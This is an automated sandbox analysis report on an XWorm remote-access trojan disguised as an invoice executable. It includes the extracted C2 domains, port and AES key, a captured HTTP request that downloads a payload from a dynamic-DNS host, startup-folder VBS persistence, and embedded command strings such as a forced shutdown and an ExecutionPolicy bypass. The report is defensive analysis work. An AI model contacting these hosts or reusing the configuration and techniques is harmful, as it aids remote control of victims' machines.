Edit tour

Windows Analysis Report
COHC INVOI NO 2500385 .exe

Overview

General Information

Sample name:	COHC INVOI NO 2500385 .exe
Analysis ID:	1633338
MD5:	31f1e66669c6784c4baae3c060a8c662
SHA1:	b05be0f311fc157e8321f0da93377bae4687193a
SHA256:	2e026a7538a02673cb6d0f7b3592c08d35a9a00cc94c553a7ac17a93533d81cd
Tags:	exeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

COHC INVOI NO 2500385 .exe (PID: 7828 cmdline: "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe" MD5: 31F1E66669C6784C4BAAE3C060A8C662)

COHC INVOI NO 2500385 .exe (PID: 1136 cmdline: "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe" MD5: 31F1E66669C6784C4BAAE3C060A8C662)

WerFault.exe (PID: 1752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 936 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["officialtrmmy.ydns.eu", "sdremm.ydns.eu", "bich23.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6cf8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e0d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6acd:$cnc4: POST / HTTP/1.1
00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12aef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12b8c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12ca1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12961:$cnc4: POST / HTTP/1.1
00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1351995919.00000000062A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc5b50:$s8: Win32_ComputerSystem 0x11d4eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12a873:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11d588:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12a910:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11d69d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12aa25:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11d35d:$cnc4: POST / HTTP/1.1 0x12a6e5:$cnc4: POST / HTTP/1.1
Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: COHC INVOI NO 2500385 .exe PID: 1136	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.COHC INVOI NO 2500385 .exe.62a0000.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.COHC INVOI NO 2500385 .exe.62a0000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.COHC INVOI NO 2500385 .exe.3ea9550.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4907:$str05: Select * from AntivirusProduct 0x4b05:$str06: PCRestart 0x4b19:$str07: shutdown.exe /f /r /t 0 0x4bcb:$str08: StopReport 0x4ba1:$str09: StopDDos 0x4ca3:$str10: sendPlugin 0x4d23:$str11: OfflineKeylogger Not Enabled 0x4e89:$str12: -ExecutionPolicy Bypass -File " 0x4fb2:$str13: Content-length: 5235
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x505b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x50f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x520d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4ecd:$cnc4: POST / HTTP/1.1
7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6707:$str05: Select * from AntivirusProduct 0x6905:$str06: PCRestart 0x6919:$str07: shutdown.exe /f /r /t 0 0x69cb:$str08: StopReport 0x69a1:$str09: StopDDos 0x6aa3:$str10: sendPlugin 0x6b23:$str11: OfflineKeylogger Not Enabled 0x6c89:$str12: -ExecutionPolicy Bypass -File " 0x6db2:$str13: Content-length: 5235
7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ef8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x700d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ccd:$cnc4: POST / HTTP/1.1
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x12d6d:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x12d5e:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x1306e:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x12a16:$str04: get_ServicePack 0x6707:$str05: Select * from AntivirusProduct 0x13a8f:$str05: Select * from AntivirusProduct 0x6905:$str06: PCRestart 0x13c8d:$str06: PCRestart 0x6919:$str07: shutdown.exe /f /r /t 0 0x13ca1:$str07: shutdown.exe /f /r /t 0 0x69cb:$str08: StopReport 0x13d53:$str08: StopReport 0x69a1:$str09: StopDDos 0x13d29:$str09: StopDDos 0x6aa3:$str10: sendPlugin 0x13e2b:$str10: sendPlugin 0x6b23:$str11: OfflineKeylogger Not Enabled
0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e5b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x141e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ef8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14280:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x700d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14395:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ccd:$cnc4: POST / HTTP/1.1 0x14055:$cnc4: POST / HTTP/1.1
0.2.COHC INVOI NO 2500385 .exe.3ea9550.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 8 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe, ProcessId: 7828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: COHC INVOI NO 2500385 .exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

Avira: detection malicious, Label: HEUR/AGEN.1308645

Found malware configuration

Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["officialtrmmy.ydns.eu", "sdremm.ydns.eu", "bich23.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: COHC INVOI NO 2500385 .exe	Virustotal: Detection: 36%			Perma Link
Source: COHC INVOI NO 2500385 .exe	ReversingLabs: Detection: 36%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: officialtrmmy.ydns.eu,sdremm.ydns.eu,bich23.ydns.eu
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 4050
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DAVID
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source: COHC INVOI NO 2500385 .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: COHC INVOI NO 2500385 .exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbWl source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.00000000013A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b77a5c561934e089\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.00000000013B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000004042000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1355519997.0000000006540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000004042000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1355519997.0000000006540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\COHC INVOI NO 2500385 .PDB source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2448694210.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\COHC INVOI NO 2500385 .PDB source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbm source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2450611172.000000000140C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2448694210.0000000000DD8000.00000004.00000010.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: officialtrmmy.ydns.eu
Source: Malware configuration extractor	URLs: sdremm.ydns.eu
Source: Malware configuration extractor	URLs: bich23.ydns.eu

Source: global traffic

HTTP traffic detected: GET /1/12/panel/uploads/Hggvtg.mp3 HTTP/1.1Host: dr16899.ydns.euConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 45.144.214.104 45.144.214.104

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /1/12/panel/uploads/Hggvtg.mp3 HTTP/1.1Host: dr16899.ydns.euConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: dr16899.ydns.eu

Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dr16899.ydns.eu
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3
Source: COHC INVOI NO 2500385 .exe, Count.exe.0.dr	String found in binary or memory: http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3Yd3/t6WgCmxQaSXEOKTneeXNZHS1DgBbPFIgkjoFZ3y4=1X4
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8F178	0_2_02E8F178
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8DEA0	0_2_02E8DEA0
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8A120	0_2_02E8A120
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8A130	0_2_02E8A130
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8A6A8	0_2_02E8A6A8
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_02E8A6B8	0_2_02E8A6B8
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_06C4F8A8	0_2_06C4F8A8
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_06C4E2F8	0_2_06C4E2F8
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_06C30040	0_2_06C30040
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 0_2_06C30023	0_2_06C30023
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Code function: 7_2_01290B92	7_2_01290B92

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 936

Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEncrfas.dll" vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1350476502.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameEncrfas.dll" vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.000000000302F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338136818.000000000117E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000004042000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1355519997.0000000006540000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000000.00000000.1200821683.0000000000C12000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDOGGY NORMAL B.exe> vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe, 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDAVID.exe4 vs COHC INVOI NO 2500385 .exe
Source: COHC INVOI NO 2500385 .exe	Binary or memory string: OriginalFilenameDOGGY NORMAL B.exe> vs COHC INVOI NO 2500385 .exe

